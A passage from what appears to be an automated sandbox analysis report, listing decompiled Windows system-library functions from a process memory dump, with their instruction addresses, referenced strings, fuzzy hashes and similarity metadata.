				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04B84120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04BA9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04BA9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04BA95D0();
							goto L11;
						} else {
							_t109 = L04B84620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E04BAF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04BA95D0();
										L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x04b9f0d3
0x04b9f0d9
0x04b9f0e0
0x04b9f0e7
0x04b9f0f2
0x04b9f0f4
0x04b9f0f8
0x04b9f100
0x04b9f108
0x04b9f10d
0x04b9f115
0x04b9f116
0x04b9f11f
0x04b9f123
0x04b9f124
0x04b9f12c
0x04b9f130
0x04b9f134
0x04b9f13d
0x04b9f144
0x04b9f14b
0x04b9f152
0x04bdbab0
0x04bdbab0
0x04b9f158
0x04b9f158
0x04b9f15a
0x04b9f160
0x04b9f165
0x04b9f166
0x04b9f16f
0x04b9f173
0x04bdbaa7
0x04bdbaa7
0x04bdbaab
0x00000000
0x04b9f179
0x04b9f18d
0x04b9f191
0x04bdbaa2
0x00000000
0x04b9f197
0x04b9f19b
0x04b9f1a2
0x04b9f1a9
0x04b9f1af
0x04b9f1b2
0x04b9f1b6
0x04b9f1b9
0x04b9f1c4
0x04b9f1d8
0x04b9f1df
0x04b9f1e3
0x04b9f1eb
0x04b9f1ee
0x04b9f1f4
0x04b9f20f
0x04bdbab7
0x04bdbabb
0x04bdbacc
0x04bdbad1
0x04b9f215
0x04b9f218
0x04b9f226
0x04b9f22b
0x00000000
0x04b9f22b
0x04b9f1f6
0x04b9f1f6
0x04b9f1f9
0x04b9f1fb
0x04b9f1fb
0x04b9f1f4
0x04b9f191
0x04b9f173
0x04b9f152
0x04b9f203

Strings

@, xrefs: 04B9F124

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: f1da4b64cb0e1fc6150b14d198b17103df9ecd50e31558d34c94cd2a77c43c3c
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: A8516B71604711AFD320DF29C840A6BBBF8FF48714F10896EF9A597690EBB4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04BE3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04BE3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4c5d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04BA0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04BE3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04BAFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04BE3540;
						E04BAFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04BBDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04BF0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04BA97C0();
					}
					return E04BAB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04BE3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04BE3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04BAFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04BA9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04BE3787(_a4,  &_v352, _t80);
						}
					}
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04BA95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x04be3552
0x04be355a
0x04be355d
0x04be3566
0x04be3567
0x04be357e
0x04be358f
0x04be35a1
0x04be35a5
0x04be366b
0x04be366b
0x04be366d
0x04be3672
0x04be3679
0x04be3685
0x04be368d
0x04be369d
0x04be36a7
0x04be36b8
0x04be36c6
0x04be36c7
0x04be36dc
0x04be36e1
0x04be36e7
0x04be36e9
0x04be36e9
0x04be3703
0x04be3703
0x04be35b5
0x04be35c0
0x04be35c4
0x00000000
0x00000000
0x04be35ca
0x04be35d7
0x04be35e2
0x04be35e6
0x04be35e8
0x04be35f5
0x04be35fa
0x04be3603
0x04be3604
0x04be3609
0x04be360a
0x04be3612
0x04be3613
0x04be361e
0x04be3622
0x04be3628
0x04be362f
0x04be362f
0x04be3636
0x04be3638
0x04be363b
0x04be3642
0x04be3642
0x04be3636
0x04be3657
0x04be3657
0x04be365c
0x04be3662
0x04be3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 04BE358F

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: d9a9e5dd257233a2ade5c3431b54320af0b5739eb5d2eaf92560fa5853c7ac36
Instruction ID: 92a5ea47ac7a1bb8db2f651d1aadd2971479b56deaf78e9ad4898a445b7e5c45
Opcode Fuzzy Hash: d9a9e5dd257233a2ade5c3431b54320af0b5739eb5d2eaf92560fa5853c7ac36
Instruction Fuzzy Hash: AB4114B190552C9EEB219A61DC81FEEB77CAB44718F0045E5AA19A7240DB30AE89CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04C305AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04C305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E04C307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04BA9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E04C2A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E04C2A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04C31293(_t79, _v40, E04C307DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04B87D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E04C2138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x04c305c5
0x04c305ca
0x04c305d3
0x04c306db
0x04c306db
0x04c306dd
0x04c306e3
0x04c306e3
0x04c305dd
0x04c305e7
0x04c305f6
0x04c30600
0x04c30607
0x04c30610
0x04c30615
0x04c3061a
0x04c3061c
0x04c3061e
0x04c30624
0x04c30625
0x04c30627
0x04c30628
0x04c30631
0x04c30640
0x04c3064d
0x04c30654
0x04c30654
0x04c30631
0x04c3066d
0x04c30674
0x00000000
0x00000000
0x04c30692
0x04c3069e
0x04c306b0
0x04c306a0
0x04c306a9
0x04c306a9
0x04c306b8
0x04c306d6
0x04c306d6
0x00000000

Strings

`, xrefs: 04C30633

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 508617e4fb7aa1b8b62088f4210e09ebc0c8427115ff9dd2feea4b36431aacb1
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 8B31D332704345ABE720DE26CD45F9B77EAAB84758F044229FD54AB288DB70FA14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04BE3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04BE3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04BA9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04B84620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04BA9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x04be3893
0x04be3896
0x04be3899
0x04be389f
0x04be38a0
0x04be38a4
0x04be38a9
0x04be38ac
0x04be38ad
0x04be38ae
0x04be38af
0x04be38b1
0x04be38b4
0x04be38bb
0x04be38bc
0x04be38bd
0x04be38c4
0x04be38c8
0x04be38ca
0x04be38ca
0x04be38d5
0x04be393e
0x04be3940
0x04be3942
0x04be3952
0x04be3954
0x04be3961
0x04be3961
0x04be3967
0x04be396e
0x04be396e
0x04be3947
0x04be394c
0x00000000
0x04be394c
0x04be38ea
0x04be38ee
0x04be38f8
0x04be38f9
0x04be38ff
0x04be3900
0x04be3902
0x04be3903
0x04be390b
0x04be390f
0x04be3950
0x00000000
0x04be3950
0x04be3915
0x04be391d
0x04be391d
0x04be3922
0x04be3926
0x00000000
0x04be3928
0x04be392b
0x04be392b
0x04be3935
0x04be3937
0x04be3937
0x00000000
0x04be3935
0x04be3926
0x04be38f0
0x00000000

Strings

BinaryName, xrefs: 04BE38B4

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: ccad645953e1d77e5c8916f584abf9e6f54d9e51a86e12abf7a93e42bd74d193
Instruction ID: 2e0211aaf10dbf1c9ee5ac2f2a0507d44b249024de2886535b8f7be7ba3808cb
Opcode Fuzzy Hash: ccad645953e1d77e5c8916f584abf9e6f54d9e51a86e12abf7a93e42bd74d193
Instruction Fuzzy Hash: 5031F676900519BFEB15DA5AC945D7BB7B4EFD0720F0141A9AE15A7640D730BE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04B9D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E04B9D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4c5d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04B84120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04BAB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04BA98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04BA95D0();
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x04b9d29c
0x04b9d2a6
0x04b9d2b1
0x04b9d2b5
0x04b9d2b6
0x04b9d2bc
0x04b9d2bd
0x04b9d2be
0x04b9d2bf
0x04b9d2c2
0x04b9d2c4
0x04b9d2cc
0x04b9d384
0x04b9d34b
0x04b9d34f
0x04b9d350
0x04b9d351
0x04b9d35c
0x04b9d35c
0x04b9d2d6
0x04b9d2da
0x04b9d2e1
0x04b9d361
0x04b9d369
0x04b9d36d
0x04b9d2e3
0x04b9d2e3
0x04b9d2e3
0x04b9d2e5
0x04b9d2ed
0x04b9d2f5
0x04b9d2fa
0x04b9d302
0x04b9d303
0x04b9d30b
0x04b9d30f
0x04b9d313
0x04b9d318
0x04b9d31c
0x04b9d320
0x04b9d379
0x04b9d37d
0x00000000
0x00000000
0x04bdaffe
0x04bdb001
0x04bdb011
0x00000000
0x04b9d322
0x04b9d322
0x04b9d330
0x04b9d337
0x04b9d35d
0x04b9d339
0x04b9d33f
0x04b9d38c
0x04b9d38c
0x04b9d33f
0x04b9d349
0x00000000
0x04b9d349

Strings

@, xrefs: 04B9D303

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 24a8e25316dc542bf8beddf4b7926870e6dca1a52812867530ced93092c75ba4
Instruction ID: 9b985c6c92ec4ad560125145a2c3d17065e3879485cfdf6652d5b8f9f5b7e163
Opcode Fuzzy Hash: 24a8e25316dc542bf8beddf4b7926870e6dca1a52812867530ced93092c75ba4
Instruction Fuzzy Hash: 6F3171B560C3059FDB11DF2AC98096BBBECEB85754F0009BEF99593250E638ED04DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04B71B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04B71B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04BABB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04BAA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04BAA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04B84620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x04b71b8f
0x04b71b9a
0x04b71b9c
0x04b71b9e
0x04b71ba3
0x04bc7010
0x04bc7010
0x00000000
0x04b71ba9
0x04b71ba9
0x04b71bae
0x00000000
0x04b71bc5
0x04b71bca
0x04b71bcf
0x04b71bd0
0x04b71bd1
0x04b71bd2
0x04b71bd6
0x04b71bdc
0x04b71be0
0x04bc6ffc
0x04bc7000
0x00000000
0x04bc7006
0x04bc7009
0x04bc7009
0x04b71be6
0x04b71bec
0x04b71c0b
0x04b71c0b
0x04b71c0c
0x04b71c11
0x04b71c12
0x04b71c15
0x04b71c1b
0x04b71c1f
0x04b71c31
0x04b71c33
0x04bc7026
0x04bc7026
0x04b71c21
0x04b71c24
0x04b71c24
0x04b71bee
0x04b71bee
0x04b71bf2
0x04b71c3a
0x04b71bf4
0x04b71bf4
0x04b71c05
0x04b71c05
0x04b71c09
0x04b71c3e
0x00000000
0x00000000
0x00000000
0x04b71c09
0x04b71bec
0x04b71be0
0x04b71bae
0x04b71c2e

Strings

WindowsExcludedProcs, xrefs: 04B71BC5

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 39e1d9b2b545b17fd70348ec41a636746e523922df5b55c2bc5db0eff6bb75c8
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: C721B676605129ABDB219AED8880F5B7BADEB45754F0544E5A9249F300EA30F900EBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04B8F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B8F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x04b8f71d
0x04b8f722
0x04b8f726
0x04bd4770
0x04b8f765
0x04b8f769
0x04b8f769
0x04b8f732
0x04bd477a
0x00000000
0x04bd477a
0x04b8f738
0x04b8f73a
0x04b8f73c
0x04b8f73f
0x04b8f746
0x04b8f778
0x04b8f7a9
0x04b8f7a9
0x04b8f754
0x04b8f75a
0x04b8f75d
0x04b8f75f
0x04b8f761
0x04b8f76f
0x04b8f771
0x04b8f771
0x04b8f76f
0x04b8f763
0x00000000
0x04b8f763
0x04b8f77d
0x04b8f7a3
0x04b8f7a5
0x00000000
0x04b8f7a5
0x04b8f77f
0x04b8f782
0x04b8f784
0x04b8f786
0x00000000
0x00000000
0x00000000
0x04b8f788
0x04b8f748
0x04b8f74d
0x04b8f78d
0x04b8f793
0x04b8f7b7
0x04b8f7bc
0x00000000
0x04b8f7bc
0x04b8f798
0x00000000
0x00000000
0x04b8f79d
0x04b8f7b0
0x00000000
0x04b8f7b0
0x04b8f79f
0x00000000
0x04b8f74f
0x04b8f74f
0x00000000
0x04b8f74f

Strings

Actx , xrefs: 04B8F73F

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: bedaffd137d20c09c412f9e015146da23a033a4ef25648d62ea1576e93f45750
Instruction ID: 81c26df2d1658c8fc942d796a62cc8bd18861988fc55cfe38850a8cd4f37d28f
Opcode Fuzzy Hash: bedaffd137d20c09c412f9e015146da23a033a4ef25648d62ea1576e93f45750
Instruction Fuzzy Hash: 6711BF3D7046028BFB246E1DC8907367296EB8A764F2446AEE862CB391EB74F840D340

Uniqueness

Uniqueness Score: -1.00%

Function 04C18DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04C18DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4c40d50);
				E04BBD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04BF5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04BBDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
